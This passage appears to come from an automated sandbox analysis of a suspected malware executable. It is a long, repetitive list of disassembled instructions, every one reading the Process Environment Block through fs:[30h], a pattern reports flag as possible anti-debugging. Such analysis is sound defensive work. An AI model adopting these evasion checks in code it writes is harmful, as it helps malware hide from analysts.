          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]
